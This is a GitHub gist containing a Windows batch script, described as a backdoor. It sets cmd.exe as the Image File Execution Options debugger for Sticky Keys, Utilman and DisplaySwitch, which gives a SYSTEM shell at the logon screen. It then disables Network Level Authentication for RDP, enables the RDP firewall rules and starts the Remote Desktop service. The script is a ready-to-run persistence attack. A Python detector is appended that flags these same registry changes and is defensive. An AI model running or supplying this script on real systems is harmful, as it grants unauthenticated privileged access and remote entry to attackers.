ahhh/c9db63033ac89734b72c
Last active September 9, 2022 10:17
Batch script to launch a cmd backdoor when Sticky Keys, Utilman, or display keyboard hotkeys are toggled. Also starts RDP.
REM Set cmd.exe as the IFEO "Debugger" for three logon-screen accessibility binaries, so launching them starts cmd.exe instead.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
REM Set UserAuthentication to 0, so RDP connections do not require Network Level Authentication.
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
REM Enable the Remote Desktop firewall rules (legacy and advfirewall syntax) and start the Remote Desktop service.
netsh firewall set service type = remotedesktop mode = enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net start TermService
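
A defender-side check for the registry changes this script makes, as an added example that is not part of the original gist: it parses the text of a `reg export` file and reports Debugger values under Image File Execution Options and a disabled UserAuthentication setting on RDP-Tcp. The sample export, its notepad.exe entry and the function names are constructed for illustration.

```python
import re

# Logon-screen binaries named in the script above, compared lowercased.
WATCHED = {"sethc.exe", "utilman.exe", "displayswitch.exe"}
IFEO = r"software\microsoft\windows nt\currentversion\image file execution options"
RDP_TCP = r"system\currentcontrolset\control\terminal server\winstations\rdp-tcp"
KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VAL_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')

# Constructed sample in .reg export format (real exports are UTF-16: open with encoding="utf-16").
SAMPLE = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\windows\\system32\\cmd.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\dbg.exe"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"UserAuthentication"=dword:00000000
"PortNumber"=dword:00000d3d
'''

def parse_reg(text):
    """Yield (key, value_name, raw_data) for each named value in .reg export text."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        m = VAL_RE.match(line)
        if m and key:
            yield key, m.group("name"), m.group("data")

def audit(text):
    """Return findings as (severity, key, detail) tuples."""
    findings = []
    for key, name, data in parse_reg(text):
        low = key.lower()
        parent, _, leaf = low.rpartition("\\")
        if parent.endswith(IFEO) and name.lower() == "debugger":
            target = data.strip('"').replace("\\\\", "\\")  # undo .reg escaping
            sev = "high" if leaf in WATCHED else "review"  # other binaries may be legitimate debugging
            findings.append((sev, key, f"Debugger={target}"))
        elif low.endswith(RDP_TCP) and name.lower() == "userauthentication":
            if data.lower().startswith("dword:") and int(data[6:], 16) == 0:
                findings.append(("high", key, "NLA disabled (UserAuthentication=0)"))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```
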